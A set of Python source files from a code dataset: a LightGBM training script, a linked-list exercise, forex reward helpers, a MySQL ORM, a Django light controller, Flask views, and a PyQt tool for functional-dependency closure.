and len(data[features].drop_duplicates()) <= np.max(nunique):\n print(new_feature, 'is unvalid cross feature:')\n return data\n temp = data.groupby(features).size().reset_index().rename(columns={0: new_feature})\n data = data.merge(temp, 'left', on=features)\n if is_feature:\n count_feature_list.append(new_feature)\n # print('in feature_count, data.shape: {}, features: {}, new_feature: {}'.format(\n # data.shape, features, new_feature))\n return data\n\n\n\nfor i in origin_cate_list:\n n = df_merged[i].nunique()\n if n > 5:\n df_merged = feature_count(df_merged, [i])\n # data = feature_count(data, ['day', 'hour', i])\n else:\n print('feature: ', i, ' nunique less than 5')\n\nprint('after add feature_count, df_merged.shape is ', df_merged.shape, df_merged.columns)\n\ncate_feature = origin_cate_list\nnum_feature = ['h', 'w', 'hour', 'minute'] + count_feature_list\nfeature = cate_feature + num_feature\n\n# predict = data[(data.label == -1) & (data.data_type == 2)]\npredict = df_merged[(df_merged.label == -1)]\n\npredict_result = predict[['sid']]\npredict_result['predicted_score'] = 0\npredict_x = predict.drop('label', axis=1)\ntrain_x = df_merged[df_merged.label != -1].reset_index(drop=True)\ntrain_y = train_x.pop('label').values\nbase_train_csr = sparse.csr_matrix((len(train_x), 0))\nbase_predict_csr = sparse.csr_matrix((len(predict_x), 0))\n\nenc = OneHotEncoder()\nfor feature in cate_feature:\n print('one-hot processing feature:', feature)\n enc.fit(df_merged[feature].values.reshape(-1, 1))\n base_train_csr = sparse.hstack((base_train_csr, enc.transform(train_x[feature].values.reshape(-1, 1))),\n 'csr', 'bool')\n base_predict_csr = sparse.hstack((base_predict_csr, enc.transform(predict[feature].values.reshape(-1, 1))),\n 'csr', 'bool')\nprint('one-hot prepared !')\n\ntrain_csr = sparse.hstack(\n (sparse.csr_matrix(train_x[num_feature]), base_train_csr), 'csr').astype('float32')\n\npredict_csr = sparse.hstack(\n (sparse.csr_matrix(predict_x[num_feature]), base_predict_csr), 'csr').astype('float32')\n\n\nprint('train_csr.shape is ', train_csr.shape,\n 'predict_csr.shape is ', predict_csr.shape)\n\nprint('get here 777')\n\n# sys.exit(0)\n\nlgb_model = lgb.LGBMClassifier(\n boosting_type='gbdt', num_leaves=61, reg_alpha=3, reg_lambda=1,\n max_depth=-1, n_estimators=500, objective='binary',\n subsample=0.8, colsample_bytree=0.8, subsample_freq=1,\n learning_rate=0.035, random_state=2018, n_jobs=10\n)\nskf = StratifiedKFold(n_splits=5, random_state=2018, shuffle=True)\n\nfinal_f1_score = []\nbest_score = []\n\nfor index, (train_index, test_index) in enumerate(skf.split(train_csr, train_y)):\n print('in enumerate 888, index: ', index)\n print('len of train_index', len(train_index), 'len of test_index', len(test_index))\n lgb_model.fit(train_csr[train_index], train_y[train_index],\n eval_set=[(train_csr[train_index], train_y[train_index]),\n (train_csr[test_index], train_y[test_index])], early_stopping_rounds=200, verbose=10)\n best_score.append(lgb_model.best_score_['valid_1']['binary_logloss'])\n print(best_score)\n\n partial_pred = lgb_model.predict(train_csr[test_index], num_iteration=lgb_model.best_iteration_)\n f1 = f1_score(train_y[test_index], partial_pred, average='macro')\n final_f1_score.append(f1)\n print('f1 is ', f1)\n print('final_f1_score is ', final_f1_score)\n\n test_pred = lgb_model.predict_proba(predict_csr, num_iteration=lgb_model.best_iteration_)[:, 1]\n test_pred_outcome = lgb_model.predict(predict_csr, num_iteration=lgb_model.best_iteration_).astype(int)\n test_pred_outcome_from_val = (test_pred > 0.5).astype(int)\n\n print('test_pred.head(20)', test_pred[:20])\n print('test_pred_outcome_from_val.head(20)', test_pred_outcome_from_val[:20])\n print('test_pred_outcome.head(20)', test_pred_outcome[:20])\n\n print()\n\n predict_result['predicted_score'] = predict_result['predicted_score'] + test_pred\n\npredict_result['predicted_score'] = predict_result['predicted_score'] / 5.0\n\npredict_result['label'] = (predict_result['predicted_score'].values > 0.5)\npredict_result['label'] = predict_result['label'].astype(int)\n\nnow_str = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\npredict_result[['sid', 'label']].to_csv(current_path + '/submission/lgb_outcome_{}.csv'.format(now_str),\n index=False)\n\nprint('ends here!')\n\n\n\n\n\n\n\n","sub_path":"kkbox-music-recommendation-challenge/model_tsg.py","file_name":"model_tsg.py","file_ext":"py","file_size_in_byte":8989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288060451","text":"# LinkedList: A doubly-linked list.\n# Bonus: Has an insert_in_order that, when used, keeps the values of\n# each node in ascending order.\n# Implement as many operations as possible with recursion.\n# If you can't figure it out recursively, use a loop. (But then refactor\n# your implementation into a recursive one!)\n# Your implementation should pass the tests in test_sorted_list.py.\n# YOUR NAME\n\n# class Node:\n# def __init__(self, next, prev, value):\n# self.value = value\n# self.next = None\n# self.prev = None\n# return\n\n# def get_data(self):\n# return self.value\n\nclass LinkedList:\n def __init__(self, value = None):\n self.value = value\n self.next = self\n self.prev = self\n\n def is_sentinel(self):\n if self.value is None:\n return True\n return False\n\n def is_empty(self):\n if self.next != self or self.prev != self:\n return False\n return True\n\n def is_last(self):\n #returns boolean variable whether a node is last\n if self.next.is_sentinel():\n return True\n return False\n \n def last(self): \n #returns last node\n if self.is_last():\n return self #if next node is sentinel node, this node is the last.\n else:\n self = self.next\n return self.last() #\n\n def append(self, new_node):\n if self.is_empty():\n self.next = new_node\n new_node.next = self\n new_node.prev = self\n self.prev = new_node\n elif self.is_sentinel():\n new_node.next = self\n self.prev = new_node\n self = self.last()\n new_node.prev = self\n self.next = new_node\n else:\n self = self.next\n self.append(new_node)\n\n def delete(self):\n if self.is_empty():\n return None\n else:\n self.prev.next = self.next\n self.next.prev = self.prev\n \n def insert(self, insertee):\n a\n self.append(instertee)\n\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431432216","text":"import logging\n\n\nDATA = [\n {'currency': 'AUDUSD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'EURGBP', 'trail': 50, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'EURUSD', 'trail': 15, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'EURJPY', 'trail': 150, 'intervals': [1440], 'pip_mul': 100},\n\n {'currency': 'GBPUSD', 'trail': 40, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'GBPJPY', 'trail': 150, 'intervals': [1440], 'pip_mul': 100},\n\n {'currency': 'NZDUSD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n # 7 mar 40\n # 9 mar 60\n\n {'currency': 'USDCAD', 'trail': 60, 'intervals': [1440], 'pip_mul': 10000},\n\n {'currency': 'USDCHF', 'trail': 50, 'intervals': [1440], 'pip_mul': 10000},\n # 7 mar 40\n # 9 mar 50\n\n {'currency': 'USDJPY', 'trail': 30, 'intervals': [1440], 'pip_mul': 100},\n]\n\nPERIODS = [5, 21]\n\n\ndef getState(df, periods):\n logging.info('State: periods {0}...'.format(periods))\n\n s = []\n row = df.iloc[0]\n\n for x in periods:\n s.append('1' if row['ma_{0}_bullish'.format(x)] else '0')\n s.append('1' if row['ma_{0}_divergence'.format(x)] else '0')\n s.append('1' if row['ma_{0}_magnitude'.format(x)] else '0')\n\n for y in periods:\n if y <= x:\n continue\n s.append('1' if row['ma_{0}_crossover_{1}_bullish'.format(x, y)] else '0')\n s.append('1' if row['ma_{0}_crossover_{1}_divergence'.format(x, y)] else '0')\n s.append('1' if row['ma_{0}_crossover_{1}_magnitude'.format(x, y)] else '0')\n # logging.debug('State: moving average {0}'.format(s))\n\n s_string = ''.join(s)\n logging.debug('State: {0}'.format(s_string))\n\n return s_string\n\n\ndef getReward(df, a, pip_mul):\n a_trade, a_trailing = a.split('-')\n logging.info('Reward: {0} with {1} stoploss'.format(a_trade, a_trailing))\n\n entry = df.iloc[0]['close']\n logging.debug('Reward: entry at {0:.4f}'.format(entry))\n if a_trade == 'buy':\n trail = -(float(a_trailing) / pip_mul)\n elif a_trade == 'sell':\n trail = (float(a_trailing) / pip_mul)\n else:\n raise Exception('Unknown trade type {0}'.format(a_trade))\n take = entry + trail\n logging.debug('Reward: trail at {0:.4f}'.format(trail))\n\n ticks = -1\n r = 0\n for i, row in df.iterrows():\n ticks += 1\n logging.debug('Reward: {0} {1} {2:.4f} stop {3:.4f}'.format(a_trade, i, row['close'], take))\n # buy\n if a_trade == 'buy':\n # exit?\n if row['low'] < take:\n logging.debug('Reward: take profit triggered: low [{0:.4f}] < take [{1:.4f}]'.format(row['low'], take))\n r += take - entry\n break\n # new high?\n if row['high'] + trail > take:\n logging.debug('Reward: new high: high [{0:.4f}] + trail [{1:0.4f}] > take [{2:.4f}]'.format(row['high'], trail, take))\n take = row['high'] + trail\n # sell\n if a_trade == 'sell':\n # exit?\n if row['high'] > take:\n logging.debug('Reward: take profit triggered: high [{0:.4f}] > take [{1:.4f}]'.format(row['high'], take))\n r += entry - take\n break\n # new low?\n if row['low'] + trail < take:\n logging.debug('Reward: new low: low [{0:.4f}] + trail [{1:0.4f}] < take [{2:.4f}]'.format(row['low'], trail, take))\n take = row['low'] + trail\n\n r -= (ticks * 2) / pip_mul\n\n return r, ticks\n","sub_path":"16_rf_ma/beta/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12919762","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport traceback\r\nfrom common import mysql\r\n\r\n'''\r\nmysql orm\r\nclass User(Model):\r\n __table__ = 'users'\r\n __primary_key__ = dict(\r\n id = '',\r\n )\r\n __fields__ = dict(\r\n email = '',\r\n passwd = '',\r\n admin = 0,\r\n name = '',\r\n image = '',\r\n created_at = '',\r\n )\r\n\r\n'''\r\n\r\n__author__ = 'Sola'\r\n\r\nclass ModelMetaclass(type):\r\n def __new__(cls, name, bases, attrs):\r\n if name == 'Model':\r\n return type.__new__(cls, name, bases, attrs)\r\n\r\n tableName = attrs.get('__table__', None) or name\r\n if not attrs.get('__primary_key__', None):\r\n raise RuntimeError('table[%s] Primary key not found' % tableName)\r\n if '__fields__' not in attrs:\r\n raise RuntimeError('table[%s] fields not found' % tableName)\r\n\r\n attrs['__table__'] = tableName\r\n\r\n escaped_fields = list(map(lambda f: '`%s`' % f, attrs.get('__fields__')))\r\n escaped_keys = list(map(lambda f: '`%s`' % f, attrs.get('__primary_key__')))\r\n attrs['__select__'] = 'select %s, %s from `%s`' % (', ' . join(escaped_keys), ', ' . join(escaped_fields), tableName)\r\n return type.__new__(cls, name, bases, attrs)\r\n\r\n\r\nclass Model(dict, metaclass=ModelMetaclass):\r\n def __init__(self, insert=None, **kw):\r\n self._dirty = dict()\r\n self._insert = insert\r\n #default value\r\n for k, v in self.__primary_key__.items():\r\n if k not in kw:\r\n kw[k] = v\r\n for k, v in self.__fields__.items():\r\n if k not in kw:\r\n kw[k] = v\r\n elif not self._insert:\r\n self._dirty[k] = True\r\n dict.__init__(self, **kw)\r\n\r\n\r\n def __getattr__(self, key):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n raise AttributeError(r\"Model[%s] object has no attribute '%s'\" % (self.__class__.__name__, key))\r\n\r\n def __setattr__(self, key, value):\r\n self[key] = value\r\n\r\n def __setitem__(self, key, value):\r\n if key in self.__primary_key__:\r\n raise RuntimeError('some one try change table[%s] primary key' % self.__table__)\r\n\r\n if key in self.__fields__:\r\n self._dirty[key] = True\r\n\r\n dict.__setitem__(self, key, value)\r\n\r\n @classmethod\r\n async def find(self, where=None, **kw):\r\n if where:\r\n sql = self.__select__ + where\r\n else:\r\n param = ''\r\n for k, v in kw.items():\r\n param += '`%s`' % k + ' = ' + str(v)\r\n if len(param) == 0:\r\n sql = self.__select__\r\n else:\r\n sql = '%s where %s' % (self.__select__, param)\r\n rs, _ = await mysql.execute(sql)\r\n if len(rs) == 0:\r\n return []\r\n return list(map(lambda f: self(**f, insert=True), rs))\r\n\r\n async def save(self):\r\n if self._insert:\r\n print(self._dirty)\r\n if len(self._dirty) == 0:\r\n return\r\n temp_keys = []\r\n temp_values = []\r\n for k in self.__primary_key__.keys():\r\n temp_keys.append(\"`%s`='%s'\" % (k, str(self[k])))\r\n\r\n for k in self._dirty.keys():\r\n temp_values.append(\"`%s`='%s'\" % (k, str(self[k])))\r\n\r\n sql = 'update `%s` set %s where %s' % (self.__table__, ', ' . join(temp_values), 'and '. join(temp_keys))\r\n else:\r\n temp_keys = []\r\n temp_values = []\r\n for k in self.__primary_key__.keys():\r\n temp_keys.append(k)\r\n temp_values.append(str(self[k]))\r\n for k in self._dirty.keys():\r\n temp_keys.append(k)\r\n temp_values.append(str(self[k]))\r\n\r\n escaped_keys = list(map(lambda f: '`%s`' % f, temp_keys))\r\n escaped_values = list(map(lambda f: \"'%s'\" % f, temp_values))\r\n sql = 'insert into `%s` (%s) values (%s)' % (self.__table__, ', ' . join(escaped_keys), ', ' . join(escaped_values))\r\n self._insert = True\r\n\r\n self._dirty.clear()\r\n return await mysql.execute(sql)\r\n\r\n","sub_path":"python/common/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162196683","text":"import os\nimport sys\nfrom typing import Union\nfrom datetime import datetime\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"plant_kiper.settings\")\nsys.path.insert(0, os.path.abspath(\"..\"))\ndjango.setup()\n\nfrom plant_kiper.settings import controller_logger, CONTROLLERS_LOOP_EVERY\nfrom core.controller import BaseTimeRangeController\nfrom plant_core.models import PlantSettings, UvLight\n\n# give a name for controlled device\n# for printing / logging purpose\nCONTROLLED_DEVICE: str = \"uv-light\"\n\n# Print template\n# generic template for logging/print (for log remove datetime_now)\nPRINT_TEMPLATE = (\n \"[INFO] [{device}] ; \"\n \"start_at={light_start_at} ; \"\n \"end_at={light_end_at} ; \"\n \"{_action}\"\n)\n\nfirst_loop: bool = True\nlast_action: Union[int, None] = None\n\n\ndef main():\n global first_loop, last_action\n\n # Example of configuration dict returned\n # by PlantSettings.get_settings()\n # {'id': x,\n # 'plant_identifier': 'my bansaï ficus',\n # 'plant_type': 'ficus',\n # 'air_temperature': 22.0,\n # 'air_hygrometry': 50.0,\n # 'air_co2_ppm': 5500.0,\n # 'soil_hygrometry': 52.0,\n # 'light_start': datetime.time(19, 10),\n # 'light_end': datetime.time(19, 30)}\n plant_settings: dict = PlantSettings.get_settings()\n\n start_at = plant_settings[\"light_start\"]\n end_at = plant_settings[\"light_end\"]\n\n # Create time based controller\n uv_io_ctl = BaseTimeRangeController(start_at, end_at)\n\n # set current time\n uv_io_ctl.set_current_time(datetime.now().time())\n # Get action\n action: int = uv_io_ctl.action\n # init last_action for init\n if first_loop:\n first_loop = False\n last_action = action\n controller_logger.info(\n PRINT_TEMPLATE.format(\n device=CONTROLLED_DEVICE,\n light_start_at=start_at,\n light_end_at=end_at,\n _action=action,\n ),\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n UvLight.set_power_status(action)\n elif action != last_action:\n last_action = action\n controller_logger.info(\n PRINT_TEMPLATE.format(\n device=CONTROLLED_DEVICE,\n light_start_at=start_at,\n light_end_at=end_at,\n _action=action,\n ),\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n UvLight.set_power_status(action)\n\n\nif __name__ == \"__main__\":\n controller_logger.warning(\n f\"[WARNING] [{CONTROLLED_DEVICE}] device debug mode, \"\n f\"use controller/run.py to load controller\",\n extra={\"tags\": {\"controller\": CONTROLLED_DEVICE}},\n )\n while True:\n main()\n","sub_path":"controllers/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247215675","text":"from flask import render_template, redirect, request\n\nimport app.wordlists as wordlists\nfrom app import app\nfrom app.forms import JobAdForm\nfrom app.models import JobAd, TranslatedWordlist\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n form = JobAdForm()\n if request.method == \"POST\" and form.validate_on_submit():\n ad = JobAd(form.texttotest.data, form.language.data)\n return redirect(\"results/{0}\".format(ad.hash))\n return render_template(\n \"home.html\", form=form, number_of_languages=len(wordlists.__all__)\n )\n\n\n@app.route(\"/about\")\ndef about():\n language = request.values.get(\"language\")\n if language not in wordlists.all_lists.keys():\n language = \"en\"\n return render_template(\n \"about.html\",\n language_code=language,\n language_name=wordlists.all_lists[language][\"language_name\"],\n masculine_coded_words=wordlists.all_lists[language][\"masculine_coded_words\"],\n feminine_coded_words=wordlists.all_lists[language][\"feminine_coded_words\"],\n domain=request.headers.get(\"Host\"),\n )\n\n\n@app.route(\"/results/\")\ndef results(ad_hash):\n job_ad = JobAd.query.get_or_404(ad_hash)\n masculine_coded_words, feminine_coded_words = job_ad.list_words()\n name, code, source = TranslatedWordlist.get_language_name_and_source(\n job_ad.language\n )\n return render_template(\n \"results.html\",\n job_ad=job_ad,\n masculine_coded_words=masculine_coded_words,\n masculine_coded_word_count=job_ad.masculine_word_count,\n feminine_coded_words=feminine_coded_words,\n feminine_coded_word_count=job_ad.feminine_word_count,\n explanation=job_ad.provide_explanation(),\n language_name=name,\n language_code=code,\n source=source,\n domain=request.headers.get(\"Host\"),\n )\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template(\"404.html\"), 404\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"476875794","text":"#\n# setup.py\n# Nazareno Bruschi \n#\n# Copyright (C) 2019-2020 University of Bologna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# If is 1 only the selected-below kernel is created (SINGLE KERNEL SOLUTION). Otherwise, all kernels are created (ALL KERNELS SOLUTION)\n\nSINGLE_KERNEL = 1\n\n# Select layer dimensions from supported ones:\n\n# -> input channels:\n# - all values if less precision between ifmaps and weights is INT8\n# - multiples of 2 if less precision between ifmaps and weights is INT4\n# - multiples of 4 if less precision between ifmaps and weights in INT2\n# -> output channels:\n# - all values if less precision is INT8\n# - multiples of 2 for uint4 output activations precision\n# - multiples of 4 for uint2 output activations precision\n# -> input/output activations:\n# - all values for dim_x\n# - all values for dim_y\n\nTYPE_OF_KERNEL = 'pointwise'\n\n# Select from the supported ones:\n\n# -> pointwise, depthwise, linear_no_quant, linear_quant\n\n# If SINGLE_KERNEL = 0 these will be ignored. Otherwise, select the possibilities from the supported ones\n#\n# -> input activations precision:\n# - 8, 4, 2\n# -> output activations precision:\n# - 8, 4, 2\n# -> weights precision:\n# - 8, 4, 2\n# -> quantization method:\n# - shift_clip\n\nin_precision = 8\nwt_precision = 8\nout_precision = 8\nquantization_type = 'shift_clip'\n\n# if depthwise CH_IM_IN must be equal to CH_IM_OUT\nDIM_IM_IN_X = 8\nDIM_IM_IN_Y = 8\nCH_IM_IN = 8\nDIM_IM_OUT_X = 8\nDIM_IM_OUT_Y = 8\nCH_IM_OUT = 4\n# if is not linear\nDIM_KERNEL_X = 3\nDIM_KERNEL_Y = 3\nPADDING_Y_TOP = 1\nPADDING_Y_BOTTOM = 1\nPADDING_X_LEFT = 1\nPADDING_X_RIGHT = 1\nSTRIDE_X = 1\nSTRIDE_Y = 1\n# Quantization and bias paramenters\nBIAS_SHIFT = 0\nOUT_MULT = 10","sub_path":"mixed/scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218107026","text":"import sys\nimport json\nimport copy\n\n\n\nfrom PyQt5.QtWidgets import (QMainWindow, QApplication, QWidget, QPushButton, QLabel, QFileDialog, QTableWidget,\n\n QAction, QLineEdit, QMessageBox, QVBoxLayout,QVBoxLayout, QGroupBox,QTextEdit, QFormLayout, QPlainTextEdit,QTableWidgetItem)\n\nfrom PyQt5.QtGui import QIcon\n\nfrom PyQt5.QtCore import pyqtSlot\n\n#Clases desarrolladas\n\nfrom Relation import Relation\n\nfrom funcdep import FuncDep\n\n\n\n#Variables Globales\n\n#Instancia relacion con listas vacias de atributos y dependencias\n\n#r = Relation(Attributes,FunctionalDependences)\n\nr = Relation(list(),list())\n\ndescriptors = []\n\nfileNameJson = \"\"\n\nc = []\n\ndataOutJson = {}\n\natributos = []\n\ndfs = []\n\ndecriptoresList = []\n\ndata = {}\n\n\n\nclass App(QMainWindow):\n\n \n\n def __init__(self):\n\n super().__init__()\n\n self.title = 'Database designer: Closure and Minimal Cover'\n\n self.left = 100\n\n self.top = 100\n\n self.width = 900\n\n self.height = 600\n\n #INICIO\n\n self.initUI()\n\n \n\n def initUI(self):\n try:\n self.setWindowTitle(self.title)\n\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n \n\n mainMenu = self.menuBar() \n\n fileMenu = mainMenu.addMenu('File')\n\n uploadMenu = mainMenu.addMenu('Archivo')\n\n \n\n exitButton = QAction(QIcon('exit24.png'), 'Exit', self)\n\n exitButton.setShortcut('Ctrl+Q')\n\n exitButton.setStatusTip('Exit application')\n\n exitButton.triggered.connect(self.close)\n\n # exitButton.clicked.connect(self.on_click)\n\n fileMenu.addAction(exitButton)\n\n\n\n uploadFileButton = QAction(QIcon('exit24.png'), 'Subir archivo', self)\n\n uploadFileButton.triggered.connect(self.alert) \n\n uploadMenu.addAction(uploadFileButton)\n\n\n\n #Crea los labels\n\n self.labelAtr = QLabel(\"Atributos\", self)\n\n self.labelAtr.move(20,40)\n\n self.labelAtr.resize(280,20)\n\n\n\n # Crea textbox\n\n self.textboxAtrs = QLineEdit(self)\n\n self.textboxAtrs.move(100, 40) \n\n self.textboxAtrs.setPlaceholderText(\"Ingrese los atributos separados por comas\")\n\n self.textboxAtrs.resize(400,20)\n\n\n\n self.labelDf = QLabel(\"Dependencias \", self)\n\n self.labelDf.move(20,70)\n\n self.labelDf.resize(280,20)\n\n \n\n # Crea textbox\n\n self.textboxDf = QLineEdit(self)\n\n self.textboxDf.move(100, 70) \n\n self.textboxDf.setPlaceholderText(\"Ingrese las dependencias de la forma X->Y,Z;A,B->Z,X\")\n\n self.textboxDf.resize(400,20)\n\n\n\n self.labelDecriptor = QLabel(\"Decriptores\", self)\n\n self.labelDecriptor.move(20,100)\n\n self.labelDecriptor.resize(280,20)\n\n \n\n # Crea textbox\n\n self.textboxDecriptor = QLineEdit(self)\n\n self.textboxDecriptor.move(100, 100) \n\n self.textboxDecriptor.setPlaceholderText(\"Ingrese el decriptor\")\n\n self.textboxDecriptor.resize(400,20)\n\n\n # Crea boton para calcular recubrimiento mínomi\n self.buttonSaveJson = QPushButton('Calculo de clave', self)\n self.buttonSaveJson.move(20,275)\n self.buttonSaveJson.resize(300,32)\n self.buttonSaveJson.clicked.connect(self.calculoClave)\n\n \n\n # Crea a button in the window\n\n self.buttonCalculate = QPushButton('Calcular cierre de los inputs', self)\n\n self.buttonCalculate.resize(300,32)\n\n self.buttonCalculate.move(20,240)\n\n self.buttonCalculate.clicked.connect(self.clickCalculate)\n\n \n\n\n\n # Crea textArea\n\n self.textArea = QPlainTextEdit(self)\n\n self.textArea.setPlaceholderText(\"Resultados\")\n\n self.textArea.move(350,350)\n\n self.textArea.resize(400,200)\n\n\n\n # Crea a button in the window\n\n self.buttonSaveJson = QPushButton('Calcular cierre del descriptor (Json)', self)\n\n self.buttonSaveJson.move(20,135)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.clickSaveJson)\n\n\n\n\n\n # Crea boton para calcular recubrimiento mínomi\n\n self.buttonSaveJson = QPushButton('Recubrimiento mínimo', self)\n\n self.buttonSaveJson.move(20,170)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.recubrimientoMinimo)\n \n # Crea boton para borrar los datos\n\n self.buttonSaveJson = QPushButton('Borrar ', self)\n\n self.buttonSaveJson.move(20,205)\n\n self.buttonSaveJson.resize(300,32)\n\n self.buttonSaveJson.clicked.connect(self.resetVarClean)\n\n\n\n # Crea textArea\n\n self.textAreaJson = QPlainTextEdit(self)\n\n self.textAreaJson.setPlaceholderText(\"Json\")\n\n self.textAreaJson.move(350,135)\n\n self.textAreaJson.resize(400,200)\n\n self.show()\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n \n\n\n @pyqtSlot()\n\n def clickCalculate(self):\n\n try:\n\n if self.textboxDecriptor.text() != \"\":\n\n self.resetVar()\n\n self.textArea.clear()\n\n atrs = self.textboxAtrs.text()\n\n df = self.textboxDf.text()\n\n strDescarga = self.calculateClosureFromInputs(atrs, df)\n\n self.textArea.appendPlainText(strDescarga)\n\n else:\n\n QMessageBox.question(self, 'Alerta', \"Debe ingresar atributos, dependencias y el decriptor\", QMessageBox.Ok, QMessageBox.Ok)\n\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n \n\n @pyqtSlot()\n\n def clickSaveJson(self):\n\n try:\n\n if self.textboxDecriptor.text() == \"\":\n\n QMessageBox.question(self, 'Alerta', \"Debe ingresar el descriptor\", QMessageBox.Ok, QMessageBox.Ok)\n\n elif self.textAreaJson.toPlainText() == \"\": \n\n QMessageBox.question(self, 'Alerta', \"Seleccione un archivo json\", QMessageBox.Ok, QMessageBox.Ok)\n\n else:\n\n file = open(self.fileNameJson,\"w\") \n\n file.write(self.textAreaJson.toPlainText()) \n\n file.close()\n\n self.calculateClosureFromJson(self.fileNameJson)\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def resetVarClean(self):\n \n global r,dfs,descriptors,atributos,c,data,dataOutJson,decriptoresList\n \n r = Relation(list(),list())\n \n r.setAttributes(list())\n \n r.setDependences(list())\n \n descriptors = []\n \n c = []\n \n dataOutJson = {}\n \n atributos = []\n \n dfs = []\n \n decriptoresList = []\n \n data = {}\n self.textAreaJson.clear()\n self.textArea.clear()\n \n \n \n \n\n def resetVar(self):\n\n global r,dfs,descriptors,atributos,c,data,dataOutJson,decriptoresList\n\n r = Relation(list(),list())\n\n r.setAttributes(list())\n\n r.setDependences(list())\n\n descriptors = []\n\n c = []\n\n dataOutJson = {}\n\n atributos = []\n\n dfs = []\n\n decriptoresList = []\n\n data = {}\n\n \n\n def alert(self):\n\n self.openFileNameDialog()\n\n\n\n def openFileNameDialog(self): \n\n options = QFileDialog.Options()\n\n options |= QFileDialog.DontUseNativeDialog\n\n fileName, _ = QFileDialog.getOpenFileName(self,\"QFileDialog.getOpenFileName()\", \"\",\"All Files (*);;Python Files (*.py)\", options=options)\n\n if fileName:\n\n self.fileNameJson = fileName\n\n self.setJsonTextArea(fileName)\n\n #self.calculateClosureFromJson(fileName)\n\n \n\n\n\n def calculateClosureFromInputs(self, atribs, depends):\n\n try:\n atributos = atribs.strip().split(\",\")\n\n \n\n for atTmp in atributos:\n\n r.addAttribute(atTmp)\n\n \n\n dfs = []\n\n dependsPlit = depends.strip().split(\";\")\n\n for dependencias in dependsPlit:\n\n dependDescrip = dependencias.strip().split('->')\n\n\n\n implicantes = []\t\t\n\n for implicante in dependDescrip[0].strip().split(\",\"):\n\n implicantes.append(implicante)\n\n\n\n print(dependDescrip[1].strip().split(\",\"))\n\n\n\n implicados = []\t\t\n\n for implicado in dependDescrip[1].strip().split(\",\"):\n\n implicados.append(implicado)\n\n \n\n fd = FuncDep(list(implicantes),list(implicados))\n\n dfs.append(fd)\n\n \n\n r.setDependences(dfs)\n\n print (\"Dependencias:\")\n\n for d in r.getDependences():\n\n print(d.getImplicantes(),\"->\",d.getImplicados())\n\n\n\n self.calculateClosureWithDescriptors()\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def setJsonTextArea(self,fileName):\n\n fileEdit = open(fileName, \"r\")\n\n self.textAreaJson.appendPlainText(fileEdit.read()) \n\n fileEdit.close() \n\n \n\n def calculateClosureFromJson(self,fileName,getRObject = False):\n\n try:\n with open(fileName) as file:\n\n data = json.load(file)\n\n \n\n for atTmp in data['attributes']:\n\n r.addAttribute(atTmp)\n\n \n\n for deps in data['dependences']:\n\n fd = FuncDep(list(deps['implicante']),list(deps['implicado']))\n\n dfs.append(fd)\n\n r.setDependences(dfs)\n\n \n\n if(getRObject == True):\n\n return r\n\n else:\n\n self.calculateClosureWithDescriptors()\n\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n def calculoClave(self):\n try:\n strResult =\"\";\n #Obtiene el grupo de dependencias con el algoritmo del cierre mínimo calculado\n R = self.recubrimientoMinimo(True)\n m2 = []\n l1 = []\n \n T = R.getAttributes();\n #Halla la resta entre T y V (Z)\n Z = R.restaAttrImplicados();\n\n strResult += \"L = \"+R.printDependences()+\"\\n\\n\";\n\n strResult += \"T = \";\n strResult += ''.join(str(e) for e in T);\n\n strResult += '\\nZ: ';\n strResult += ''.join(str(e) for e in Z);\n\n strResult += '\\nZ+: ';\n strResult += 